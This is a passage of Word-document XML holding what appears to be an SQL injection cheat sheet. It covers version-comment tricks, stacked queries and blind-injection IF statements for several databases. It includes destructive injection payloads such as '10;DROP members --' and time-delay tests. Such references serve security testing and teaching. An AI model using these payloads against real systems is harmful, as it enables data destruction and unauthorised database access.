          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>You will get the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>same response</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> if MySQL version is higher than </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>8.0.27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AFAB23" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E6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w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>80027</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> 1/0, */ 1 FROM tablename</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>Will throw a </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>division by 0 error </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if MySQL version is higher than </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>8.0.27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C456197"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bookmarkStart w:id="8" w:name="StackingQueries"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Stacking queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBDABB5"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Stacking means executing more than one query in one transaction. This technique can be very useful but only works for some combinations of database server and access method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33710E07" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E6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w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (MSP) </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SELECT * FROM members; DROP members--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13340321"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When successful, this will end one query and start another one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D68C1A2"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Note that results from the second query (and any additional queries) are </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> returned to the application. You need to use </w:t>
      </w:r>
      <w:hyperlink r:id="rId87" w:anchor="BlindSQLInjections" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>blind SQL injection methods</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> to confirm that the second query is working, such as a delay, DNS query, etc.</w:t>
      </w:r>
      <w:bookmarkStart w:id="9" w:name="LangDbFigure"/>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="46D949FB"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bookmarkStart w:id="10" w:name="StackedSamples"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Stacked SQL injection attack samples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F7EBC4" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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ID value: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10;DROP members --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1C7FE9" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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 FROM products WHERE id = 10; DROP members--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32641950"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This will run </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DROP members</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> SQL sentence after normal SQL Query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452BDBB8"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bookmarkStart w:id="11" w:name="IfStatements"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If statements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E98EA86"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lastRenderedPageBreak/>
        <w:t>Get response based on an </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IF</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> statement. This is one of the key techniques for Blind SQL Injection. Also very useful to test simpler things blindly yet accurately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B69F7DD"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bookmarkStart w:id="12" w:name="MySQLIf"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MySQL If statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B56A350" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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IF(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>condition</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true-part</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>false-part</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(M) </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SELECT IF(1=1,'true','false')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C41F96"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bookmarkStart w:id="13" w:name="SQLServerIf"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL Server If statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFC8A26" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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IF </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>condition</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true-part</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> ELSE </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>false-part</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (S) </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IF (1=1) SELECT 'true' ELSE SELECT 'false'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664C804F"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Oracle If statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE352DC" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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BEGIN</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>IF </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>condition</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> THEN </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true-part</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; ELSE </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>false-part</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; END IF; END;</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (O) </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IF (1=1) THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEE7492"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PostgreSQL If statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFAFD26" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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CASE WHEN </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>condition</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> THEN </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true-part</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> ELSE </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>false-part</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> END;</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (P) </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SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CE7B3D"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SQLite If statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335AA43C" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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iif(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
